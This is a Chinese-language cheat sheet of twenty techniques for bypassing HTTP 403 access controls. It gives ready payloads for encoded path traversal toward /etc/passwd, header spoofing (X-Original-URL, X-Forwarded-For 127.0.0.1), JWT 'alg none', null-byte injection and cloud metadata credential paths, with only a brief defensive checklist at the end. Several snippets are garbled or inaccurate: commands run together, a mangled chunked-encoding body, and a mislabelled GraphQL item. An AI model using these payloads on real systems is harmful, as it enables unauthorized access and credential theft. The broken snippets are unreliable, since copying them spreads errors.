20个403 bypass技巧

一、HTTP协议层绕过

1. 1. 协议降级攻击通过强制使用HTTP/1.0协议绕过现代WAF检测：

curl -0 -H "Host: target.com" http://target.com/protected/

原理：部分服务器对旧协议版本的权限校验存在漏洞

1. 2. 请求方法混淆尝试非常规HTTP方法组合：

curl -X PATCH http://target.com/admincurl -X ARBITRARY http://target.com/config

实测案例：某云存储服务对PROPFIND方法的校验缺失

1. 3. 端口混淆攻击利用非常规服务端口绕过路径限制：

http://target.com:8080/admin -> http://target.com:8443/admin

配合Nmap端口扫描可发现隐藏的管理接口

1. 4. 协议隧道技术通过HTTPS加密通道绕过明文检测：

https://target.com/../http://internal/

需要配合SSRF漏洞使用

1. 5. 分块编码绕过利用Transfer-Encoding头混淆内容长度检测：

requests.post(url, headers={'Transfer-Encoding': 'chunked'}, data="0rnrn")

二、路径探测艺术

1. 6. URL标准化绕过

/admin => /ADMIN => /%61dmin => /admin/

Windows系统对大小写不敏感的特性

1. 7. 双重编码攻击

/%252e%252e%252f => ../ 

多层URL编码混淆检测逻辑

1. 8. 后缀污染技术

/admin.config => /admin.%20 => /admin..json

利用服务器解析优先级差异

1. 9. 反向代理路径重构

GET / HTTP/1.1Host: internal-server:8080

通过修改Host头穿透反向代理

1. 10. 参数污染攻击

/api?file=legit&file=../../etc/passwd

利用参数解析顺序漏洞

1. 11. 空字节注入

/admin%00.jpg => /admin.php

PHP特定版本的空字节截断漏洞

三、Header工程学突破

1. 12. X-Original-URL绕过

GET / HTTP/1.1X-Original-URL: /admin

适用于Nginx反向代理场景

1. 13. Referer伪造链

Referer: https://target.com/admin

部分ACL策略存在自引用白名单

1. 14. X-Forwarded-For欺骗

X-Forwarded-For: 127.0.0.1

利用IP白名单机制缺陷

1. 15. Content-Type变形

Content-Type: application/x-www-form-urlencoded

强制改变请求体解析方式

四、认证体系突破

1. 16. Cookie参数污染

Cookie: valid=1; session=xxx

通过添加多余参数绕过正则校验

1. 17. JWT算法混淆修改JWT头部为：

{"alg":"none"}

未正确校验签名算法的典型案例

1. 18. Basic认证空密码

Authorization: Basic 

部分实现允许空密码访问

五、现代架构突破

1. 19. GraphQL别名污染

query{  __schema {    types { name }}}

通过内省查询发现隐藏接口

1. 20. 云元数据接口穿透

GET /latest/meta-data/iam/security-credentials/

AWS/Aliyun元数据服务配置不当

防御体系建设要点

1. 1. 实施最小权限原则（POLP）
2. 2. 统一大小写处理策略
3. 3. 部署深度流量分析系统
4. 4. 定期进行权限配置审计
5. 5. 启用动态WAF规则更新

工具推荐：

• • Burp Suite Intruder（爆破检测）
• • Nuclei（自动化检测模板）
• • Wfuzz（路径模糊测试）
• • JWT_Tool（令牌分析）